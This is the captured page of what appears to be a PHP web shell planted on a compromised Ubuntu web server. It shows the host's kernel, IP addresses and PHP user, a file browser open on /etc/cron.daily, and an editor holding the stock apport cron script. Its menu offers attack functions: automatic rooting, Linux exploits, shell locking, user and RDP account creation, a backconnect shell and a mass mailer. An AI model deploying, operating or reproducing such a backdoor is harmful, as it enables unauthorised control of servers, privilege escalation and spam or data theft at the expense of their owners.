Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.135.249.119
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
.placeholder
102
B
-rw-r--r--
apache2
539
B
-rwxr-xr-x
apport
376
B
-rwxr-xr-x
apt-compat
1.44
KB
-rwxr-xr-x
bsdmainutils
355
B
-rwxr-xr-x
dpkg
1.15
KB
-rwxr-xr-x
logrotate
372
B
-rwxr-xr-x
man-db
1.04
KB
-rwxr-xr-x
mdadm
539
B
-rwxr-xr-x
mlocate
538
B
-rwxr-xr-x
passwd
249
B
-rwxr-xr-x
popularity-contest
3.4
KB
-rwxr-xr-x
ubuntu-advantage-tools
246
B
-rwxr-xr-x
update-notifier-common
214
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : apport
#!/bin/sh -e # clean all crash reports which are older than a week. [ -d /var/crash ] || exit 0 find /var/crash/. ! -name . -prune -type f \( \( -size 0 -a \! -name '*.upload*' -a \! -name '*.drkonqi*' \) -o -mtime +7 \) -exec rm -f -- '{}' \; find /var/crash/. ! -name . -prune -type d -regextype posix-extended -regex '.*/[0-9]{12}$' \( -mtime +7 \) -exec rm -Rf -- '{}' \;
Close